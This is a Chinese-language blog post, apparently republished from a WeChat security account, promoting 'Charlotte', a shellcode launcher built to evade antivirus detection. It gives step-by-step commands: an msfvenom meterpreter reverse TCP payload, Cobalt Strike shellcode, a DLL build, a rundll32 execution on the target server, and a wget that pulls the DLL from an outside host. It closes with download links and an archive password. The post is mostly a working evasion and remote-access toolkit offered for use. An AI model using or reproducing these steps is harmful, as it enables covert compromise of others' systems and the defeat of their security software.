前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >charlotte免杀绕过主流杀软(实测绕过卡巴斯基,火绒)文章最后有下载地址哦

charlotte免杀绕过主流杀软(实测绕过卡巴斯基,火绒)文章最后有下载地址哦

作者头像
网e渗透安全部
发布2021-07-01 15:30:19
2.7K2
发布2021-07-01 15:30:19
举报
文章被收录于专栏:白安全组白安全组

Charlotte是一款基于C++实现的Shellcode启动器,并且完全不会被安全解决方案所检测到。

项目地址:

https://github.com/9emin1/charlotte

Charlotte特色

  1. c++ shellcode 启动器,截至 2021 年 5 月 13 日完全未被检测到 0/26。
  2. win32 api函数的动态调用
  3. shellcode和函数名的异或加密
  4. 每次运行随机 XOR 键和变量
  5. 在 Kali Linux 上,只需“apt-get install mingw-w64*”即可!
  6. 随机字符串长度和 XOR 密钥长度

杀毒软件检测截图

用法

git clone 存储库,生成命名为 beacon.bin 的 shellcode 文件,然后运行 ​​charlotte.py

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*

cd charlotte

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin

python charlotte.py

profit

使用 msfvenom -p(显示在下面的 gif POC 中)以及cobalt strike攻击原始格式有效负载进行测试

使用方法

启动命令

代码语言:javascript
复制
python charlotte.py

生成dll木马:

①使用msfvenom 生成shellcode

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$你的服务器ip LPORT=$你的服务器端口 -f raw > beacon.bin

②使用cobalt strike生成shellcode

[1]cs生成原始shellcode

选择row格式:

[2]把生成的payload.bin改名为beacon.bin

[3]把beacon.bin复制到kali里面的charlotte目录下

[4]输入如下命令生成dll文件

python charlotte.py

[5]在目标服务器上运行dll文件即可成功在cs上线

命令如下:

rundll32 charlotte.dll,lhFqKEHh

可通过如下命令从服务器上下载dll文件到目标服务器上.

wget https://www.ddosi.com/xss.dll -O xss.dll

[6]生成的dll文件火绒扫描并未发现病毒.

②卡巴斯基免杀测试

下载地址

①GitHub:

https://github.com/9emin1/charlotte.zip

②中转云: charlotte-main.rar 解压密码: www.ddosi.com

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-06-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 项目地址:
  • Charlotte特色
  • 杀毒软件检测截图
  • 使用方法
    • 启动命令
    • 下载地址
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档